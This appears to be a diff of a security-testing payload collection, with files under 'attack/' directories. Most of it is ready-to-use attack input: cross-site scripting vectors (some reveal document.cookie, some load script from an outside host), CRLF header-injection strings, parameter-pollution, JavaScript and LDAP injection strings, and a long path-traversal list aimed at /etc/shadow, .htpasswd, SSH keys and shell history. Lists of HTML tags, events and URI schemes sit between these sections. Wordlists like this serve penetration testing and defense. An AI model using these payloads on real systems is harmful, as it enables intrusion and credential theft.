<img src onerror /" '"= alt=alert(1)//">
<title onpropertychange=alert(1)></title><title title=></title>
<!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"><!-- IE 5-9 standards mode --><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
<svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg>
<svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg>
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
<div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>
<x style="background:url('x[a];color:red;/*')">XXX</x>
<!--[if]><script>alert(1)</script --><!--[if<img src=x onerror=alert(2)//]> -->
<div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe></a>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe>
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" rows="10"></textarea>
<script>function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); }}</script><body><a href="#" onclick="makePopups()">Spam</a>
<html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html>
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
<span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-1.4.4.js"></script><script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>
<script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10<script src="\\example.com\foo.js"></script> // Safari 5.0
<?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle></svg>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
<svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/><handler id="y">alert(1)</handler></svg>
<svg><style>&lt;img/src=x onerror=alert(1)// </b>
<svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'><!--Same effect with<image filter='...'>--></svg>
<math href="javascript:alert(1)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>
<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /></image></svg>
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(1)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style>
<?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet>
<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>
<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /></a>
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
<object data="javascript:alert(0)">
<img src=x:alert(alt) onerror=eval(src) alt=0>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>

115
attack/html_js_fuzz/html_tags.txt Normal file
View file

@ -0,0 +1,115 @@
<!-- -->
<!DOCTYPE>
<a>
<abbr>
<acronym>
<address>
<applet>
<area>
<article>
<aside>
<audio>
<b>
<base>
<basefont>
<bdo>
<big>
<blockquote>
<body>
<br>
<button>
<canvas>
<caption>
<center>
<cite>
<code>
<col>
<colgroup>
<command>
<datalist>
<dd>
<del>
<details>
<dfn>
<dir>
<div>
<dl>
<dt>
<em>
<embed>
<fieldset>
<figcaption>
<figure>
<font>
<footer>
<form>
<frame>
<frameset>
<h1>
<head>
<header>
<hgroup>
<hr>
<html>
<i>
<iframe>
<img>
<input>
<ins>
<keygen>
<kbd>
<label>
<legend>
<li>
<link>
<map>
<mark>
<menu>
<meta>
<meter>
<nav>
<noframes>
<noscript>
<object>
<ol>
<optgroup>
<option>
<output>
<p>
<param>
<pre>
<progress>
<q>
<rp>
<rt>
<ruby>
<s>
<samp>
<script>
<section>
<select>
<small>
<source>
<span>
<strike>
<strong>
<style>
<sub>
<summary>
<sup>
<table>
<tbody>
<td>
<textarea>
<tfoot>
<th>
<thead>
<time>
<title>
<tr>
<tt>
<u>
<ul>
<var>
<video>
<xmp>

74
attack/html_js_fuzz/javascript_events.txt Normal file
View file

@ -0,0 +1,74 @@
onafterprint
onbeforeprint
onbeforeonload
onblur
onerror
onfocus
onhaschange
onload
onmessage
onoffline
ononline
onpagehide
onpageshow
onpopstate
onredo
onresize
onstorage
onundo
onunload
onblur
onchange
oncontextmenu
onfocus
onformchange
onforminput
oninput
oninvalid
onreset
onselect
onsubmit
onkeydown
onkeypress
onkeyup
onclick
ondblclick
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
onmousedown
onmousemove
onmouseout
onmouseover
onmouseup
onmousewheel
onscroll
onabort
oncanplay
oncanplaythrough
ondurationchange
onemptied
onended
onerror
onloadeddata
onloadedmetadata
onloadedstart
onpause
onplay
onplaying
onprogress
onratechange
onreadystatechange
onseeked
onseeking
onstalled
onsuspend
ontimeupdate
onvolumechange
onwaiting
style

10
attack/html_js_fuzz/js_inject.txt Normal file
View file

@ -0,0 +1,10 @@
function(){ return this.userid}
' function(){ return this.username} or '1'='1
function(){return version()}
function(){return version}
t'; return this; var d='!
" function(){ return this} or '1'='1
t"; return this; var d='!
' || this || '1'=='1
' || this.version || '1'=='1
' || '1'=='1

20
attack/http-protocol/crlf-injection.txt Normal file
View file

@ -0,0 +1,20 @@
%0d%0a
%0d%0a%0d%0a
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%5cr%5cn
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

38
attack/http-protocol/hpp.txt Normal file
View file

@ -0,0 +1,38 @@
# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
?id=id=1
&id=1?id=2
?id['&id=1']=2
?id[1&id=2]=1
?id=1&id=2
&id=1&id=2
?id=1%26id%3D2
?id&id=1
????id=1
&&&&id=1
?id=id['1']=2
?id=1#id=2
?id==1
?id===1
;id=1?id=2
?id;id=1
&id=1;id=2
#id=1?id=2&id=3
?id=1,2
?id1,id2=1
?id[=1&id=2]=3
?id[&id=2]=1
?id=[1,2]
?id&=1
?id[]=1&id=2
?id=/:@&=+$&id=2
?id[=/:@&=+$&id=2]=1
?id={id:{id:1},2}
?id[{id:{id[]:1},2}]=3
?id=%23?id=1
?id=1%26id=2
?id=1%2526id=2
?id=1%c0%a6id=2
?id=1\uc0a6id=2
?id=1&amp;id=2
?id=1&#38;id=2
?id=1%u0026;id=2

148
attack/http-protocol/known-uri-types.txt Normal file
View file

@ -0,0 +1,148 @@
aaa:
aaas:
about:
acap:
adiumxtra:
afp:
aim:
apt:
aw:
beshare:
bitcoin:
bolo:
callto:
cap:
chrome:
cid:
coap:
content:
crid:
cvs:
data:
dav:
dict:
dns:
doi:
ed2k:
facetime:
fax:
feed:
file:
finger:
fish:
ftp:
geo:
gg:
git:
gizmoproject:
go:
gopher:
gtalk:
h323:
http:
https:
iax:
icap:
im:
imap:
info:
ipp:
irc:
irc6:
ircs:
iris.beep:
iris.lws:
iris.xpcs:
iris.xpc:
iris:
itms:
jar:
javascript:
keyparc:
lastfm:
ldap:
ldaps:
lsid:
magnet:
mailto:
maps:
market:
message:
mid:
mms:
modem:
msnim:
msrps:
msrp:
mtqp:
mumble:
mupdate:
mvn:
news:
nfs:
nntp:
notes:
opaquelocktoken:
palm:
paparazzi:
platform:
pop:
pres:
prospero:
proxy:
psyc:
query:
rmi:
rsync:
rtmp:
rtsp:
secondlife:
service:
sftp:
sgn:
shttp:
sieve:
sip:
sips:
skype:
smb:
sms:
snmp:
soap.beeps:
soap.beep:
soldat:
spotify:
ssh:
steam:
svn:
tag:
teamspeak:
tel:
telnet:
tftp:
things:
thismessage:
tip:
tv:
udp:
unreal:
urn:
ut2004:
uuid:
vemmi:
ventrilo:
view-source:
wais:
webcal:
wss:
ws:
wtai:
wyciwyg:
xfire:
xmlrpc.beeps:
xmlrpc.beep :
xmpp:
xri:
ymsgr:
z39.50r:
z39.50s:

89
attack/json/JSON_Fuzzing.txt Normal file
View file

File diff suppressed because one or more lines are too long

28
attack/ldap/ldap-injection.txt Normal file
View file

@ -0,0 +1,28 @@
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

867
attack/lfi/JHADDIX_LFI.txt Normal file
View file

@ -0,0 +1,867 @@
/.../.../.../.../.../
\…..\\\…..\\\…..\\\
%00../../../../../../etc/passwd
%00/etc/passwd%00
%00../../../../../../etc/shadow
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/../../../../../../../../%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
=3D “/..” . “%2f..
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
admin/access_log
/admin/install.php
../../../administrator/inbox
/apache2/logs/access_log
/apache2/logs/access.log
/apache2/logs/error_log
/apache2/logs/error.log
/apache/logs/access_log
/apache/logs/access.log
../../../../../apache/logs/access.log
../../../../apache/logs/access.log
../../../apache/logs/access.log
../../apache/logs/access.log
../apache/logs/access.log
/apache/logs/error_log
/apache/logs/error.log
../../../../../apache/logs/error.log
../../../../apache/logs/error.log
../../../apache/logs/error.log
../../apache/logs/error.log
../apache/logs/error.log
/apache\php\php.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
/.bash_history
/.bash_profile
/.bashrc
/../../../../../../../../bin/id|
/bin/php.ini
/boot/grub/grub.conf
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
..//..//..//..//..//boot.ini
../../../../../../../../../../../../boot.ini
../../boot.ini
..\../..\../..\../..\../boot.ini
..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\AppServ\MySQL
C:/boot.ini
C:\boot.ini
/C:/inetpub/ftproot/
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
c:\inetpub\wwwroot\index.asp
/config.asp
../config.asp
config.asp
../config.inc.php
config.inc.php
../config.js
config.js
_config.php
../_config.php
../config.php
config.php
../_config.php%00
../../../../../../../../conf/server.xml
/core/config.php
/C:\Program Files\
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
/.cshrc
c:\System32\Inetsrv\metabase.xml
c:WINDOWS/system32/
d:\AppServ\MySQL
database.asp
database.js
database.php
data.php
dbase.php a
db.php
../../../../../../../dev
/D:\Program Files\
d:\System32\Inetsrv\metabase.xml
/etc/apache2/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apt/sources.list
/etc/chrootUsers
/etc/crontab
/etc/defaultdomain
/etc/default/passwd
/etc/defaultrouter
/etc/fstab
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.ce1
/etc/hostname.ce2
/etc/hostname.ce3
/etc/hostname.dcelx0
/etc/hostname.dcelx1
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
/etc/hosts
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
../../../../../etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/http/httpd.conf
/etc/inetd.conf
/etc/init.d/apache
/etc/init.d/apache2
/etc/issue
/etc/logrotate.d/ftp
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/master.passwd
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/netconfig
/etc/nsswitch.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/./././././././././././etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..\../..\../..\../..\../..\../..\../etc/passwd
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
/etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../etc/passwd&=%3C%3C%3C%3C
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/cgi/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysqli.ini
/etc/php.d/mysql.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/postfix/mydomains
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/release
/etc/resolv.conf
/etc/rpc
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/./././././././././././etc/shadow
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/..\../..\../..\../..\../..\../..\../etc/shadow
/etc/shadow
../../../../../../../../../../../../etc/shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
etc/shadow%00
/etc/ssh/sshd_config
/etc/sudoers
/etc/syslog.conf
/etc/syslogd.conf
/etc/system
/etc/updatedb.conf
/etc/utmp
/etc/vfstab
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/.forward
/home2\bin\stable\apache\php.ini
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/home\bin\stable\apache\php.ini
/.htpasswd
.htpasswd
../.htpasswd
../install.php
install.php
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
/log/miscDir/accesslog
/.logout
/logs/access_log
/logs/access.log
../../../../../logs/access.log
../../../../logs/access.log
../../../logs/access.log
../../logs/access.log
../logs/access.log
/logs/error_log
/logs/error.log
../../../../../logs/error.log
../../../../logs/error.log
../../../logs/error.log
../../logs/error.log
../logs/error.log
/logs/pure-ftpd.log
/master.passwd
member/.htpasswd
members/.htpasswd
/.netrc
/NetServer\bin\stable\apache\php.ini
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
.pass
../.pass
pass.dat
passwd
/.passwd
.passwd
../.passwd
passwd.dat
/php4\php.ini
/php5\php.ini
/php\php.ini
/PHP\php.ini
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/proc/cpuinfo
/proc/interrupts
/proc/loadavg
/proc/meminfo
/proc/mounts
/proc/net/arp
/proc/net/dev
/proc/net/route
/proc/net/tcp
/proc/partitions
/proc/self/cmdline
/proc/self/envron
/proc/version
/.profile
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\xampp\apache\conf\httpd.conf
/../../../../pswd
/.rhosts
/root/.bash_history
/root/.bash_logut
root/.htpasswd
/root/.ksh_history
/root/.Xauthority
/.sh_history
/.shosts
/.ssh/authorized_keys
user/.htpasswd
../users.db.php
users.db.php
users/.htpasswd
/usr/apache2/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access. log
../../../../../../../usr/local/apache/logs/access_ log
